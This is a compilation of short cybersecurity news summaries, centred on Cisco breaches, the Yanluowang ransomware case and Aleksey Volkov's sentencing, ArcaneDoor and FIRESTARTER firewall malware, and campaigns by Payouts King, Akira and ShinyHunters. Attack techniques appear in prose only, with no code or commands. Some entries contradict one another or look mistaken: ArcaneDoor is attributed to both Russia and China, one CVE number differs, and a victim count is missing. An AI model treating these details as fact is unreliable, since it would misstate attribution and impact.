Cisco, a multinational technology conglomerate, was targeted by the Yanluowang ransomware gang in a sophisticated attack facilitated by Aleksey Volkov, an initial access broker. The group exploited network vulnerabilities to infiltrate Cisco’s systems, deploying ransomware that encrypted critical data and disrupted operations. While the article does not specify the exact financial or data losses Cisco incurred, the broader context of Yanluowang’s operations—including extortion demands, DDoS attacks, and threats to executives—suggests severe operational and reputational harm. The gang’s tactics often involved stealing sensitive corporate or customer data before encrypting systems, then demanding ransom payments under threat of public exposure or prolonged outages. Cisco’s inclusion among high-profile victims (alongside Walmart) underscores the attack’s strategic intent to cripple infrastructure and extract maximum financial gain. The involvement of a Russian national linked to defense ministry ties further elevates the attack’s geopolitical and cybersecurity significance, aligning with Yanluowang’s pattern of targeting Western enterprises with precision.

Payouts King Ransomware Abuses QEMU for Stealthy Attacks The Payouts King ransomware operation is leveraging the QEMU emulator as a reverse SSH backdoor to deploy hidden virtual machines (VMs) on compromised systems, evading endpoint security detection. QEMU, an open-source virtualization tool, allows attackers to execute malicious payloads, store files, and establish covert remote access tactics previously observed in campaigns by 3AM ransomware, LoudMiner, and CRON#TRAP. ### Two Active Campaigns Cybersecurity firm Sophos identified two distinct campaigns exploiting QEMU: 1. STAC4713 (Payouts King) - First observed in November 2025, linked to the GOLD ENCOUNTER threat group. - Initial access via exposed SonicWall VPNs and later through SolarWinds Web Help Desk (CVE-2025-26399). - More recent attacks used Cisco SSL VPN exploits and Microsoft Teams phishing, tricking employees into installing QuickAssist. - Attackers deploy a hidden Alpine Linux VM (v3.22.0) via a scheduled task (TPMProfiler), disguising virtual disks as databases or DLLs. - Tools inside the VM include AdaptixC2, Chisel, BusyBox, and Rclone, with reverse SSH tunnels for persistence. - Post-infection, they exfiltrate NTDS.dit, SAM, and SYSTEM hives via SMB and Rclone to remote SFTP servers. 2. STAC3725 (CitrixBleed 2 Exploitation) - Active since February 2025, targeting NetScaler ADC/Gateway (CVE-2025-5777). - After compromise, attackers deploy a ZIP archive containing a malicious executable that: - Installs a service (AppMgmt). - Creates a local admin user (CtxAppVCOMService). - Deploys ScreenConnect for persistence. - A QEMU-based Alpine Linux VM is then launched, where attackers manually install tools like Impacket, KrbRelayx, BloodHound.py, and Metasploit for credential harvesting, AD reconnaissance, and data exfiltration via FTP. ### Ransomware Tactics & Attribution Payouts King employs AES-256 (CTR) + RSA-4096 encryption, intermittent file encryption, and anti-analysis techniques. Ransom notes direct victims to dark web leak sites. Zscaler suggests ties to former BlackBasta affiliates, citing similar initial access methods (e.g., spam bombing, Teams phishing, Quick Assist abuse). The group also terminates security tools via low-level system calls and establishes persistence through scheduled tasks. Organizations are advised to monitor for unauthorized QEMU installations, suspicious SYSTEM-level tasks, and unusual SSH port forwarding.

Kettering Health, a major healthcare provider, fell victim to a ClickFix attack linked to the Interlock ransomware group, resulting in a significant data breach. The attack exploited social engineering tactics, tricking employees into executing malicious scripts via browser-based lures (e.g., fake CAPTCHAs or error-fixing prompts). The malicious payload was copied to the clipboard via obfuscated JavaScript and executed locally, bypassing traditional email security and endpoint detection. The breach compromised sensitive patient and employee data, including medical records, financial details, and personally identifiable information (PII). The attack leveraged SEO poisoning and malvertising via Google Search, evading conventional phishing defenses. Despite EDR (Endpoint Detection and Response) being the last line of defense, the obfuscated, user-initiated commands delayed detection, allowing the ransomware to encrypt critical systems. The incident disrupted healthcare operations, risked patient safety due to delayed treatments, and exposed Kettering Health to reputational damage, financial penalties, and potential legal liabilities. The breach underscored vulnerabilities in both technical controls and user awareness, particularly against browser-based, fileless attacks.

Government cyber agencies globally, including Canada’s CSE and the U.S. CISA, have issued urgent warnings about a sophisticated state-sponsored espionage campaign (ArcaneDoor) exploiting vulnerabilities in Cisco’s Adaptive Security Appliances (ASA), widely used for VPNs by remote workers and critical infrastructure. The attackers implanted malware, executed commands, and potentially exfiltrated data from compromised devices, targeting legacy systems with high evasion capabilities. The U.S. mandated federal agencies to patch vulnerabilities within 24 hours, labeling the threat as significant risk to victim networks. The UK’s NCSC noted the malware’s evolution in sophistication, while Cisco confirmed the actor’s focus on espionage. Critical sectors—governments, academia, and research facilities—were urged to act immediately. The attack’s scope remains under investigation, but its advanced persistence mechanisms and potential for data theft from high-value targets (e.g., state secrets, intellectual property) pose severe operational and national security risks. The campaign’s targeting of VPN infrastructure could enable lateral movement into broader networks, amplifying the threat to organizational integrity and confidentiality.

The ShinyHunters extortion group exploited compromised Drift OAuth tokens linked to Salesloft to steal over 1.5 billion Salesforce records from 760 companies. Attackers used social engineering and malicious OAuth apps to infiltrate Salesforce environments, exfiltrating massive CRM data—including 250M Account records, 579M Contact records, 171M Opportunity records, 60M User records, and 459M Case records. The breach originated from a GitHub repository compromise at Salesloft, where attackers used TruffleHog to extract secrets, including OAuth tokens for Drift and Drift Email, enabling unauthorized access to Salesforce-integrated systems.The stolen Case data was further mined for AWS keys, Snowflake tokens, and other credentials, facilitating deeper intrusions into victim networks. High-profile targets allegedly include Google, Cloudflare, Palo Alto Networks, Zscaler, Tenable, CyberArk, and others. The attackers demanded ransom payments to prevent data leaks, while also searching for additional secrets to expand their campaign. The FBI issued an advisory on the threat actors (UNC6040/6395), warning of ongoing risks. Salesforce advised customers to enforce MFA, least-privilege access, and stricter OAuth app management to mitigate exposure.

U.S. Government Agency Breached via Cisco Firewall Vulnerabilities, Persistent Malware Detected In September 2025, a U.S. federal agency was compromised by sophisticated hackers exploiting vulnerabilities in Cisco Adaptive Security Appliances (ASA). The Cybersecurity and Infrastructure Security Agency (CISA) revealed that attackers deployed FIRESTARTER, a malware strain allowing persistent access to compromised Cisco Firepower devices without re-exploiting the original flaws. The breach was discovered through CISA’s continuous monitoring, which detected suspicious connections on an agency’s Cisco Firepower device running ASA software. Forensic analysis uncovered FIRESTARTER, installed before September 25, 2025, enabling hackers to regain access in March 2026. Additionally, attackers used Line Viper, a secondary malware, to establish unauthorized VPN sessions, bypass authentication, and extract administrative credentials, certificates, and private keys. The vulnerabilities CVE-2025-30333 and CVE-2025-20362 were first flagged by CISA in September 2025, with federal agencies ordered to patch them. However, CISA later confirmed that patched systems remained vulnerable due to FIRESTARTER’s persistence mechanism. The agency also noted that attackers exploited dormant federal accounts to maintain access. While CISA has not attributed the attack, reports suggest alignment with China-linked state interests, consistent with previous campaigns like ArcaneDoor (2024). Cisco’s analysis supports this assessment, linking the activity to the same threat actors. In response, CISA issued updated directives requiring federal agencies to: - Conduct malware checks by May 1, 2026, with initial confirmations due by midnight on Friday. - Submit an inventory of all Cisco Firepower devices by May 1. - Follow CISA’s guidance for physical disconnection of infected devices if necessary. CISA emphasized that standard patching is insufficient to remove FIRESTARTER, warning agencies to avoid unplugging devices without explicit instructions. The agency will compile a report on the campaign for the National Cyber Director and White House by August 1, 2026. The incident underscores the risks of persistent malware in critical security infrastructure, particularly in widely used Cisco ASA and Firepower Threat Defense (FTD) systems.

Over 48,800 internet-exposed Cisco Adaptive Security Appliance (ASA) and Firewall Threat Defense (FTD) devices remain vulnerable to two critical flaws (CVE-2025-20333 and CVE-2025-20362), enabling remote, unauthenticated arbitrary code execution and unauthorized access to VPN endpoints. Exploitation began before patches were available, with threat actors deploying shellcode loaders (Line Viper) and GRUB bootkits (RayInitiator). The U.S. CISA issued an emergency directive, mandating federal agencies to patch or disconnect affected devices within 24 hours, while the U.K.’s NCSC confirmed active attacks. Despite warnings since late August, most exposed devices—primarily in the U.S., U.K., Japan, and Germany—remain unpatched, risking full system compromise, lateral movement, and data exfiltration. The lack of workarounds exacerbates the threat, leaving organizations vulnerable to persistent access, malware deployment, and potential supply-chain attacks if breached devices are used to pivot into corporate networks.

A security researcher has published a blog post demonstrating a complete exploit chain for CVE-2025-20281, a critical unauthenticated remote code execution vulnerability in Cisco Identity Services Engine (ISE). This vulnerability allows unauthenticated, remote attackers to upload arbitrary files to the target system and execute them with root privileges. The issue stems from unsafe deserialization and command injection in the enableStrongSwanTunnel() method. Although hotfixes were made available, Cisco urged users to update to 3.3 Patch 7 and 3.4 Patch 2 to address both vulnerabilities. On July 22, 2025, Cisco marked both CVE-2025-20281 and CVE-2025-20337 as actively exploited in attacks, urging admins to apply the security updates as soon as possible.

The U.K. National Cyber Security Centre (NCSC) disclosed that state-sponsored threat actors (UAT4356/Storm-1849, linked to China) exploited zero-day vulnerabilities (CVE-2025-20362, CVE-2025-20333) in Cisco ASA 5500-X Series firewalls to deploy previously undocumented malware (RayInitiator, LINE VIPER). The attack targeted multiple government agencies, enabling persistent access, command execution, data exfiltration, and forensic evasion by modifying the ROMMON bootloader and disabling logging. The compromised devices—end-of-support (EoS) models lacking Secure Boot—were vulnerable to full system takeover, including root-level arbitrary code execution. The campaign demonstrated advanced operational security, with malware designed to survive reboots, suppress syslogs, and bypass VPN authentication. While no direct evidence confirmed large-scale data breaches, the targeting of government infrastructure and use of nation-state tools suggest high strategic impact, potentially threatening national security, critical services, and diplomatic stability. The attack’s sophistication and persistence mechanisms indicate a long-term espionage or sabotage intent, with risks extending beyond Cisco to broader supply-chain and geopolitical consequences.

Cisco disclosed CVE-2025-20265, a critical (CVSS 10.0) remote code execution (RCE) vulnerability in its Secure Firewall Management Center (FMC) Software, affecting versions 7.0.7 and 7.7.0 when RADIUS authentication is enabled. The flaw stems from improper input validation during RADIUS credential processing, allowing unauthenticated attackers to inject and execute arbitrary shell commands with high-level privileges remotely. No authentication or user interaction is required, making it highly exploitable.The vulnerability poses a severe risk as it enables full system compromise, potentially leading to lateral movement, data exfiltration, or complete takeover of firewall management infrastructure. While no public exploitation has been reported yet, the lack of workarounds (beyond disabling RADIUS) and the critical severity demand immediate patching. Cisco has released fixes but warns that mitigation requires disabling RADIUS, which may disrupt operational workflows.The flaw was discovered internally, underscoring the proactive threat of unpatched enterprise firewall systems. Organizations failing to patch risk catastrophic breaches, including unauthorized access to sensitive networks, credential theft, or downstream attacks on connected systems.

Cybersecurity Roundup: Major Breaches, State-Backed Threats, and Critical Vulnerabilities A wave of high-profile cyber incidents, state-sponsored attacks, and critical vulnerabilities has dominated recent cybersecurity news. Law Enforcement Actions & Espionage Spanish police arrested a young hacker for exploiting a payment gateway to book luxury hotel stays for just one cent. Meanwhile, a former U.S. defense contractor executive received an 87-month prison sentence for selling stolen trade secrets, including zero-day exploits, to a Russian broker. In a separate case, a Romanian national pleaded guilty to selling unauthorized access to Oregon state government networks and other U.S. victims. State-Backed Threats & APT Activity Google’s Threat Intelligence Group (GTIG) disrupted a China-linked APT, UNC2814, halting attacks on 53 organizations across 42 countries. The Lazarus Group, a North Korean APT, deployed Medusa ransomware against a Middle East target, while APT28 (Russia) launched Operation MacroMaze, exploiting webhooks for covert data exfiltration. Dutch intelligence warned of Russia escalating hybrid attacks, preparing for a prolonged standoff with Western nations. Critical Vulnerabilities & Exploits The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added multiple flaws to its Known Exploited Vulnerabilities (KEV) catalog, including: - A Soliton Systems K.K FileZen vulnerability. - Cisco SD-WAN flaws, abused since 2023 for full admin control. - BeyondTrust (CVE-2026-1731) and VMware Aria Operations vulnerabilities enabling remote attacks. Juniper issued an emergency patch for a critical PTX router RCE flaw, while Check Point researchers exposed flaws in Claude Code that could turn untrusted repositories into attack vectors. Ransomware & Data Breaches - Everest ransomware hit Vikor Scientific’s supplier, stealing data of 140,000 patients. - ShinyHunters breached CarGurus, exposing 12.4 million users. - ManoMano, a European DIY chain, suffered a breach impacting 38 million customers. - Canadian Tire disclosed a 2025 breach affecting 38 million users. - Olympique Marseille confirmed an attempted cyberattack following a data leak. Emerging Threats & AI Risks - 12 million exposed .env files revealed widespread security misconfigurations. - Aeternum, a new botnet, hides commands in Polygon smart contracts. - An AI-powered campaign compromised 600 FortiGate systems globally. - Arkanix Stealer, an AI-assisted info-stealer, briefly operated before shutting down. - CrowdStrike reported attackers moving through networks in under 30 minutes. Geopolitical & Industry Developments - Apple’s iPhone and iPad became the first consumer devices cleared for NATO ‘RESTRICTED’ classification. - The U.S. Treasury sanctioned an exploit broker network for theft and sale of government cyber tools. - Iran’s internet faced near-total blackouts amid U.S. and Israeli strikes. - Ukraine reported cyberattacks on its energy grid being used to guide missile strikes. Malware & Campaigns - UAT-10027, a stealthy campaign, targeted U.S. education and healthcare with the Dohdoor backdoor. - Starkiller, a phishing service, proxies real login pages, including MFA. - North Korean actors deployed Medusa ransomware in a Middle East attack. - A wormable XMRig campaign used BYOVD (Bring Your Own Vulnerable Driver) and a timed kill switch for stealth. The past week underscored the growing sophistication of cyber threats, from state-sponsored espionage to AI-driven attacks and large-scale data breaches.

Tenable Report Highlights Persistent Cloud Security Risks Despite Improvements A recent report by Tenable reveals both progress and ongoing vulnerabilities in cloud security, particularly around "toxic cloud trilogies"—publicly exposed, critically vulnerable, and highly privileged cloud instances. Between October 2024 and March 2025, the number of organizations with at least one such instance on AWS or Google Cloud Platform (GCP) dropped from 38% to 29%, while those with five or more declined from 27% to 13%. Despite these improvements, Tenable warns that such exposures remain a pressing concern. The report also uncovered widespread exposure of sensitive data in cloud configurations. Researchers found that 54% of AWS Elastic Container Service (ECS) task definitions and 52% of Google CloudRun environment variables contained confidential information. Additionally, over a quarter of AWS users stored sensitive data in user data fields, with 3.5% of AWS EC2 instances holding secrets—posing a significant risk if exploited. AWS hosted the highest proportion of sensitive data (16.7% of its buckets), compared to 6.5% for GCP and 3.2% for Microsoft Azure. While nearly 80% of AWS users have enabled critical identity-checking services, the findings underscore persistent misconfigurations and overconfidence in cloud security measures. The report, released at AWS re:Invent 2024 in Las Vegas, highlights the need for continued vigilance in securing cloud environments.

Hackers, specifically the ArcaneDoor group linked to Russian state actors, exploited zero-day vulnerabilities (CVE-2024-20353 and CVE-2024-20359) in Cisco’s Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software—critical components of U.S. federal cyber infrastructure. The breach, detected on September 26, 2025, allowed attackers to execute remote denial-of-service (DoS) attacks via infinite loops and escalate privileges from administrator to root access, compromising hundreds of Cisco firewall devices used by U.S. government agencies. Classified documents were stolen, including intelligence on espionage, fraud, money laundering, and foreign agent activities, directly threatening national security. The attack follows a 2024 pattern where Cisco’s systems were repeatedly targeted, with CISA issuing emergency directives to mitigate further damage. The incident underscores systemic vulnerabilities in federal cyber defenses, with experts warning of escalating threats as other cybercriminal groups adopt ArcaneDoor’s tactics.

The Akira ransomware group exploited CVE-2024-40766, an improper access control flaw in SonicWall SonicOS SSL VPN, to breach organizations in under four hours. Attackers reused stolen credentials—harvested months prior from unpatched or improperly secured Gen 6-to-Gen 7 firewall upgrades—bypassing MFA via misconfigured SSLVPN Default Users Group settings and OTP manipulation. Once inside, they conducted lateral movement via SMB (Impacket), RDP, and Domain Controller compromise, exfiltrating data using WinRAR, rclone, and FileZilla before deploying Akira ransomware. The attack disabled EDR tools, deleted Shadow Copies, and cleared event logs, crippling recovery efforts. Victims spanned multiple industries, with SonicWall’s cloud backup service also targeted separately. The breach highlights credential reuse risks, even on patched systems, and the speed of modern ransomware operations. Organizations were urged to reset all SSL VPN/LDAP credentials and monitor for VPS logins, SMB anomalies, and unauthorized archival tools to mitigate future intrusions.

In April 2024, the China-linked APT group Velvet Ant exploited zero-day vulnerability CVE-2024-20399 in Cisco switches to deploy custom malware, gaining control over the network devices. Attackers with valid administrator credentials executed commands as root, bypassing security measures and installing the 'VELVETSHELL' malware for persistent access and espionage. The malware granted capabilities for command execution, file management, and creating traffic tunnels, compromising the integrity of Cisco's network infrastructures and potentially leading to data exfiltration.

Russian Access Broker Sentenced to Over 6 Years for Fueling $24M in Ransomware Attacks A 26-year-old Russian national, Aleksei Volkov of St. Petersburg, was sentenced to 81 months in prison by a federal court in the Southern District of Indiana for his role as an initial access broker a key player in the ransomware economy. Volkov facilitated dozens of cyberattacks across the U.S., enabling criminal groups like the Yanluowang ransomware operation to breach networks, encrypt data, and extort victims for millions. Operating as a middleman, Volkov specialized in identifying and selling unauthorized network access to cybercriminals, who then deployed ransomware. His activities resulted in over $9 million in confirmed losses and $24 million in intended damages, with victims ranging from businesses to critical organizations. The Yanluowang group, one of his buyers, previously claimed responsibility for a 2022 breach of Cisco’s corporate network, underscoring the high-profile risks posed by access brokers. Volkov was arrested in Italy on January 18, 2024, after a Bitcoin transaction linked him to the cybercrime network. Extradited to the U.S., he pleaded guilty to aggravated identity theft and access device fraud, agreeing to pay $9.17 million in restitution to victims. In addition to his prison term, he received two years of supervised probation. The case highlights the supply-chain dynamics of modern ransomware, where access brokers like Volkov enable large-scale attacks by providing the initial foothold that ransomware groups lack the expertise to secure themselves. Prosecutors emphasized that targeting these brokers disrupts the economic viability of ransomware campaigns, forcing criminal networks to either develop costly in-house intrusion capabilities or expand their supplier base both of which increase their exposure to law enforcement.

Cisco has addressed a security flaw that allowed personal data to leak from the company's Professional Careers portal. Cisco clarifies that just a small amount of information connected to job applications was stolen from the mobile version of the website in its email notification of the issue to the impacted individuals. As to the security alert distributed by Cisco to its users, an erroneous security configuration on a third-party site following system repair was the cause of data leaking. The information leaked by Cisco comprises personal details such as name, password, email address, phone number, security question answers, professional profile and educational background, cover letter, resume content, and other details.

Akira Ransomware Group Accelerates Attacks, Completing Full Compromise in Under an Hour Security researchers at Halcyon have identified a significant escalation in ransomware attack speed, with the Akira group now executing full attack lifecycles from initial access to data encryption in as little as one hour. The group, suspected to include former Conti hackers, has emerged as one of the most sophisticated ransomware operations since its debut in March 2023. Akira primarily gains entry by exploiting vulnerabilities in internet-facing VPN appliances and backup solutions, particularly those without multi-factor authentication (MFA). Targeted vendors have included SonicWall, Veeam, and Cisco, though the group also employs credential theft, spearphishing, password spraying, and initial access brokers (IABs) to breach networks. Once inside, Akira follows a double-extortion model, exfiltrating data before encrypting files. To evade detection, the group disables security software and leverages living-off-the-land tools like FileZilla, WinRAR, WinSCP, and RClone for data staging and encryption. Notably, Akira uses intermittent encryption scrambling as little as 1% of a file to maximize impact while minimizing detection time. Halcyon’s report highlights Akira’s disciplined operational tempo, with attacks typically completed in under four hours and some in less than 60 minutes. The group’s stealthy approach, reliance on zero-day exploits, and use of compromised credentials allow it to maintain covert access while rapidly encrypting systems. Since its emergence, Akira has reportedly generated $244 million in ransom payments, according to U.S. government estimates.

Critical Cisco SD-WAN Zero-Day Exploited Since 2023, Enabling Root Access Cisco has disclosed a critical zero-day vulnerability (CVE-2026-20127) in its Catalyst SD-WAN products, actively exploited since at least 2023 to bypass authentication and gain root-level access. The flaw, rated 10.0 on the CVSS scale, affects the peering authentication mechanism in Cisco Catalyst SD-WAN Controller (formerly vSmart) and SD-WAN Manager (formerly vManage), allowing unauthenticated attackers to log in as high-privileged users and manipulate network configurations via NETCONF. Exploitation enables attackers to add rogue peers, alter routing, or downgrade software to chain attacks such as leveraging CVE-2022-20775 for root escalation before restoring original versions to evade detection. Cisco Talos attributes the campaign (tracked as UAT-8616) to a sophisticated threat actor targeting critical infrastructure, with confirmed compromises of internet-exposed management planes. Patches were released on February 25, 2026, for affected versions (20.3.1–20.14.3, 20.15.1), with no workarounds available. CISA added the vulnerability to its Known Exploited Vulnerabilities Catalog the same day, issuing Emergency Directive 26-03 for federal agencies to patch within 21 days and hunt for indicators of compromise. Global cybersecurity agencies, including Australia’s ACSC and Canada’s CCCS, issued parallel alerts, citing real-world incidents involving rogue peer additions. Organizations are advised to inventory SD-WAN deployments, audit NETCONF logs, and restrict management plane access. Cisco’s guidance includes CLI checks for unauthorized peers and resetting compromised configurations. The incident underscores persistent threats to edge devices in critical sectors.

Cisco has was targeted in a data leaked by the Yanluowang ransomware gang in September 2022. The gang leaked the data that was stolen from the company network during a cyberattack in May. The stolen data included non-sensitive files from the employee’s Box folder and thousands of files amounting to 55GB and that the cache included classified documents, technical schematics, and source code.

Cisco hacked by Yanluowang ransomware gang, 2.8GB allegedly stolen. The compromised information includes cisco products or services, sensitive customer data or sensitive employee information, intellectual property, or supply chain operations. A redacted NDA agreement that was obtained in the attack was also supplied to BleepingComputer by the threat actors as evidence of the incident and a "hint" that they had infiltrated Cisco's network and taken files. They immediately took action to contain and eradicate the bad actors.

In May 2022, Cisco fell victim to a Yanluowang ransomware attack orchestrated by Aleksey Olegovich Volkov, an initial access broker (IAB) who breached the company’s network by compromising a Cisco employee’s Box folder. While the attackers exfiltrated non-sensitive files, they failed to encrypt Cisco’s systems or successfully extort a ransom. However, the incident exposed critical vulnerabilities in Cisco’s security posture, revealing that threat actors could infiltrate corporate networks, steal credentials, and potentially deploy ransomware. The attack was part of a broader campaign targeting at least eight U.S. companies, with Volkov selling network access to Yanluowang operators, who then demanded ransoms ranging from $300,000 to $15 million. Although Cisco avoided financial loss or data encryption in this instance, the breach underscored the risks of supply-chain attacks, credential theft, and ransomware-as-a-service (RaaS) operations. The FBI’s investigation later tied Volkov to LockBit ransomware as well, highlighting his role in facilitating high-impact cybercrime.

Cisco has released security patches for multiple vulnerabilities in its Small Business RV Series router platform. This vulnerability could allow any remote attacker to gain complete control over the device without authentication. The attacker could execute arbitrary code, elevate privileges, run commands, bypass authentication protections, and retrieve and execute unsigned software if exploits the flaw.

Russian Initial Access Broker Sentenced to Nearly 7 Years for Role in Yanluowang Ransomware Attacks A 26-year-old Russian national, Aleksey Olegovich Volkov (also known as "chubaka.kor" and "nets"), has been sentenced to 81 months in prison for his role as an initial access broker (IAB) in the Yanluowang ransomware attacks. Volkov pleaded guilty in November 2023 to breaching corporate networks of at least eight U.S. companies between July 2021 and November 2022, selling that access to the Yanluowang ransomware-as-a-service (RaaS) operation. The Yanluowang affiliates encrypted victims' data and demanded ransoms ranging from $300,000 to $15 million. Volkov was extradited to the U.S. after his arrest in Italy in January 2024. U.S. prosecutors charged him following an incident where the Yanluowang gang stole files from a Cisco employee's Box folder but failed to encrypt systems or collect a ransom. As part of his plea, Volkov admitted to hacking into victims' networks, stealing data, deploying ransomware, and demanding cryptocurrency payments. The Justice Department revealed that the FBI recovered chat logs, stolen data, victims' network credentials, and evidence of ransom negotiations from a seized server linked to the gang. Investigators traced Volkov's identity through Apple iCloud data, cryptocurrency exchange records, and social media accounts linked to his Russian passport and phone number. The chat logs showed Volkov negotiating a percentage of ransom payments, which totaled $1.5 million. Additionally, a screenshot from Volkov's Apple account suggested a potential link to the LockBit ransomware gang. Volkov was initially facing a maximum sentence of 53 years but was sentenced to 81 months in prison. He is required to pay over $9 million in restitution to the victims of the Yanluowang ransomware attacks. The Justice Department stated that Volkov agreed to pay full restitution to known victims, totaling $9,167,198.19, and forfeit equipment used in his crimes.

ShinyHunters Hacking Group Targets Major Organizations, Including Education Sector The cybercriminal group ShinyHunters, named after the rare "Shiny" Pokémon sought after by players, has emerged as a significant threat since 2020. According to threat intelligence from Ransomware.live, the group has compromised 104 victims across 14 countries, stealing trillions of records. The majority of attacks 73 incidents have targeted U.S.-based organizations, including high-profile names such as Microsoft, Ticketmaster, Google, Cisco, AT&T, McDonald’s, Disney/Hulu, Harvard, and Princeton. One of the group’s most disruptive attacks involved Instructure’s Canvas Learning Management System (LMS), which serves educational institutions. The breach exploited a vulnerability in the Free for Teacher environment, a no-cost version of Canvas that allows independent educators to manage classes. Following the attack, Instructure temporarily disabled the service while conducting a security review. The incident highlights broader risks posed by centralized digital ecosystems and third-party dependencies, demonstrating how modern extortion operations can disrupt critical sectors even beyond education. While technical details remain limited, the attack underscores the growing threat of sophisticated cybercriminal groups targeting both corporate and institutional infrastructure.

Pwn2Own Berlin 2026 Highlights Major Exploits as Zero-Days and Breaches Surge The second and third days of Pwn2Own Berlin 2026 saw researchers earn $385,750 in bounties, pushing the event’s total payout to $1.298 million. Among the notable exploits, Microsoft Exchange Server was successfully compromised, contributing to the growing tally. DEVCORE was crowned "Master of Pwn" after demonstrating multiple high-impact vulnerabilities. In parallel, Chaotic Eclipse disclosed MiniPlasma, a zero-day in Windows, suggesting an incomplete or overlooked security fix from 2020. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Microsoft Exchange Server flaw and a Cisco Catalyst SD-WAN vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, signaling active exploitation risks. A critical 18-year-old flaw (CVE-2026-42945) in NGINX, the world’s most widely deployed web server, was also uncovered, with experts warning of ongoing attacks. Meanwhile, Grafana confirmed a GitHub token breach after a cybercrime group claimed responsibility, while ShinyHunters breached 7-Eleven, exposing franchisee data and Salesforce records. Additional incidents included: - A public Amazon S3 bucket leaking sensitive guest data from Japanese hotel platform Tabiq. - OpenAI suffering a supply chain attack via malicious TanStack packages. - Broadcom releasing a security update for a VMware Fusion root access bug. - The Ghostwriter group resuming cyberattacks on Ukrainian government targets. - Researchers identifying YellowKey and GreenPlasma, two new Windows zero-days. - A Linux Kernel bug (Fragnesia) enabling local root access attacks. - Attackers exploiting a Funnel Builder vulnerability to inject e-skimmers into e-commerce stores. The event underscored persistent threats across enterprise software, cloud services, and critical infrastructure, with zero-days and supply chain attacks remaining dominant vectors.

A former Cisco employee accessed the company's cloud infrastructure in 2018, five months after resigning, to deploy code that led to the shutdown of more than 16,000 WebEx Teams accounts and the deletion of 456 virtual machines. 30-year-old Sudhish Kasaba Ramesh accessed Cisco's cloud infrastructure hosted on Amazon Web Services without permission on September 24, 2018. The shutdown forced Cisco to spend more than $2,400,000 in customer refunds and employee time needed to restore the damage caused by Ramesh.

A severe vulnerability in Cisco's networking equipment, identified as CVE-2018-0171, has been exploited by attackers, notably by the APT group Salt Typhoon. Despite a patch released in 2018, over 1,200 devices remain unpatched, providing an attack surface for unauthorized remote code execution and configuration theft. The attack chiefly involves using the Smart Install feature to extract sensitive data from networking devices, exacerbating the risk of further infiltrations and potentially catastrophic network breaches. This enduring security oversight, which notably affected telecommunications providers, exemplifies the danger legacy systems pose to the current technology infrastructure.

The California Office of the Attorney General reported on October 25, 2016, that Cisco Systems, Inc. experienced a data breach on August 18, 2016. The breach involved a security setting error on the Cisco Professional Careers mobile website, potentially exposing job application-related personal information including names, addresses, emails, phone numbers, and other sensitive data. Approximately individuals were affected.